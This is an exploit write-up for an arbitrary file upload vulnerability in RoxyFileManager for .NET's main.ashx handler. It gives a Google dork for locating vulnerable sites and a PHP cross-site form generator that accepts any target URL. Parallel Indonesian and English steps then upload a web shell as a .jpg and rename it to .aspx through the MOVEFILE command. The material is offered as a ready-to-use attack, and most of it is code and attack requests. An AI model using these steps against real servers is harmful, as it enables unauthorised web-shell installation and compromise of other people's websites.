roxy

# Exploit Title: RoxyFileManager For .NET (main.ashx) - Arbitrary File Upload
# Google Dork: inurl:/fileman/Uploads
# Date: 05-06-2019
# Exploit Author: AkatsuChan - Security Ghost
# Author Homepage: http://www.akatsuchan.zone.id
# Vendor Homepage: http://www.roxyfileman.com
# Software Link: http://www.roxyfileman.com/download
# Version: 1.4.4 or Older (Maybe Work in 1.4.5)
# Tested on: Windows 7

description (indonesian):

kerentanan terdapat pada file main.ashx, attacker dapat mengupload file menggunakan csrf dan juga dapat memainkn command untuk melihat,mengganti nama,dan memindahkan lokasi file atau dir

description (english):

the vulnerability in the main.ashx file, attacker can upload files using CSRF and can also play commands to view, rename, and move the location of the file or dir.

CSRF :

<?php
            echo '
			<center>
			<form method="post">
			<select name="array" required>
			<option value="files[]">files []</option>
			</select>
			<input type="text" name="target" size="50" style="width:260px";" placeholder="url http://site.com/bug/vuln.php" style="margin: 5px auto; padding-left: 5px;" required><br>
			<input  type="submit" name="kunci" value=" Kunci Sasaran!">
			</form></center>';
			$url = $_POST['target'];
			$pf = $_POST['array'];
			$terkuncyihh = $_POST['kunci'];
			if($terkuncyihh) {
			echo "<center><form method='post'
			target='_blank' action='$url'
			enctype='multipart/form-data'>
			<div class='fileUpload btn btn-primary'>Pilih File<input class='upload' type='file' name='$pf'></div>
			<input class='fileUpload btn btn-primary ' type='submit' name='g' value='&nbsp;&nbsp;Upload Cok!'></form></center>";
}

?>

poc (indonesian) :

Pertama Tambahkan Command " ?a=UPLOAD&d=/[path]/fileman/Uploads " pada main.ashx
(ex : site.com/konichiwa/fileman/asp_net/main.ashx?a=UPLOAD&d=/konichiwa/fileman/Uploads )

kemudian salin alamat tersebut lalu paste di csrf lalu klik "kunci" pilih shell kalian lalu upload.
( direkomendasikan menggunakan format .jpg terlebih dahulu lalu ikutin tutorial selanjutnya untuk merubahnya kembali ke format .aspx/.asp )

Jika shell.jpg berhasil di upload, kembali ke main.ashx lalu masukan Command ini :
" ?a=MOVEFILE&f=/[path]/fileman/Uploads/shell.jpg&n=/[path]/fileman/Uploads/shell.aspx "
(ex : site.com/konichiwa/fileman/asp_net/main.ashx?a=MOVEFILE&f=/konichiwa/fileman/Uploads/shell.jpg&n=/konichiwa/fileman/Uploads/shell.aspx )
lalu shell.jpg akan berubah menjadi shell.aspx [ hal ini tidak selalu berhasil ]

poc (english) :

First, add command " ?a=UPLOAD&d=/[path]/fileman/Uploads " on main.ashx
(ex : site.com/konichiwa/fileman/asp_net/main.ashx?a=UPLOAD&d=/konichiwa/fileman/Uploads )

second, copy that url to csrf,click "kunci" and select your shell and clic "upload"
( recomended to use .jpg extension first then follow the next tutorial to change it back to the .aspx / .asp extension )

if shell.jpg successfully uploaded, back to main.ashx and add this command :
" ?a=MOVEFILE&f=/[path]/fileman/Uploads/shell.jpg&n=/[path]/fileman/Uploads/shell.aspx "
(ex : site.com/konichiwa/fileman/asp_net/main.ashx?a=MOVEFILE&f=/konichiwa/fileman/Uploads/shell.jpg&n=/konichiwa/fileman/Uploads/shell.aspx )
then shell.jpg will change to shell.aspx [ this doesn't always work ]